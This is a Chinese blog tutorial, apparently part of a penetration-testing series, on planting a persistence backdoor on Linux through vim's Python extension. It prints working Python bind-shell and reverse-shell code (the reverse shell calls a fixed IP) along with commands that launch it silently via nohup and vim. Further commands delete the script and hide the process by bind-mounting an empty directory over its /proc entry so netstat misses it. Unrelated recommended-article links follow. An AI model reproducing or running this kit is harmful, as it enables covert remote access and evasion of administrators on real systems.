Linux权限维持之vim python 扩展后门(五)

适用于安装了vim且安装了python扩展(绝大版本默认安装)的linux系统。

复制代码
cd /usr/lib/python2.7/site-packages && $(nohup vim -E -c "pyfile dir.py">
/dev/null 2>&1 &) && sleep 2 && rm -f dir.py

$(nohup vim -E -c "py3file dir.py"> /dev/null 2>&1 &) && sleep 2 && rm -f dir.py

恶意脚本 1.py的内容可以是任何功能的后门,比如监听本地的11端口: 正向后门

复制代码
我们可以多了解看一篇文章
https://www.leavesongs.com/PYTHON/python-shell-backdoor.html 


 
from socket import *
import subprocess
import os, threading, sys, time
if __name__ == "__main__":
    server=socket(AF_INET,SOCK_STREAM) 
    server.bind(('0.0.0.0',5555))
    server.listen(5)
    print ('waiting for connect')
    talk, addr = server.accept() 
    print ('connect from',addr)
    proc = subprocess.Popen(["/bin/sh","-i"], stdin=talk, stdout=talk, 
                                  stderr=talk, shell=True)

我们新建目录 新建文件

反向后门

复制代码
import socket, subprocess, os;
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect(("192.168.241.128", 6666));
os.dup2(s.fileno(), 0);
os.dup2(s.fileno(), 1);
os.dup2(s.fileno(), 2);
p = subprocess.call(["/bin/sh", "-i"]);

隐藏后门

复制代码
(nohup vim -E -c "py3file shell.py"> /dev/null 2>&1 &)
#将nohup的执行结果输出到/dev/null中
#其中/dev/null在linux中代表空设备,结果输出到空设备也就是丢弃nohup的执行结果。          #"2"在linux中代表错误输出,"1"在linux中代表标准输出,在此处也就是nohup的输出。2>&1表示将错误  输出绑定到标准输出上,在此处也就是将错误输出同样输出到空设备上不进行显示。这样,无论nohup执行结   果是否正确,都不会有输出。

将netstat -antp 查看到的可疑连接隐藏起来,解决方法:

既然是后门,那么就不能留下自己创建的文件,可以将删除命令直接拼接到命令上

复制代码
(nohup vim -E -c "py3file 1.py"> /dev/null 2>&1 &) && sleep 2 && rm -f 1.py

我们打开 Kail 进行监听

但是 这里能看到我们们的进程

隐藏进程

复制代码
mkdir null
mount --bind null /proc/6238
netstat -anpt

#mount--bind命令是将前一个目录挂载到后一个目录上,所有对后一个目录的访问其实都是对前一个目录的访问,并且会将前一个目录路径隐藏起来(注意这里只是隐藏不是删除,数据未发生改变,仅仅 是无法访问了)。

攻击机nc连接过去就可以了:

复制代码
nohup vim -E -c "pyfile dir.py" nc 127.0.0.1 11

查看 cat /proc/$$/mountinfo 可以看到挂在的目录
sudo umount /proc/2607 sudo netstat -anpt
ps aux | grep 2607

总体步骤

刚开始

然后我们隐藏进程

然后输入

复制代码
mkdir null
mount --bind null /proc/3362
netstat -anpt

发现已经被隐藏

然后我们

复制代码
查看 cat /proc/$$/mountinfo 可以看到挂在的目录
然后取消挂载
sudo umount /proc/3362
查看进程
sudo netstat -anpt
ps aux | grep 2607

查看挂载目录

然后我们取消挂载 发现又回来了

然后我们在挂载

mount --bind null /proc/3362

现在又看不到了

然后我们进行监听

相关推荐
snoopyfly~8 分钟前
Ubuntu 24.04 LTS 服务器配置:安装 JDK、Nginx、Redis。
java·服务器·ubuntu
独行soc15 分钟前
#渗透测试#批量漏洞挖掘#HSC Mailinspector 任意文件读取漏洞(CVE-2024-34470)
linux·科技·安全·网络安全·面试·渗透测试
BD_Marathon19 分钟前
Ubuntu下Tomcat的配置
linux·ubuntu·tomcat
饥饿的半导体43 分钟前
Linux快速入门
linux·运维
BD_Marathon1 小时前
Ubuntu:Tomcat里面的catalina.sh
linux·ubuntu·tomcat
BD_Marathon1 小时前
设置LInux环境变量的方法和区别_Ubuntu/Centos
linux·ubuntu·centos
Me4神秘1 小时前
Linux国产与国外进度对垒
linux·服务器·安全
zhaowangji1 小时前
ubuntu 20.04 安装中文输入法 (sougou pin yin)
linux·ubuntu
Me4神秘1 小时前
电信、移动、联通、广电跨运营商网速慢原因
网络
老K(郭云开)2 小时前
谷歌浏览器安全输入控件-allWebSafeInput控件
安全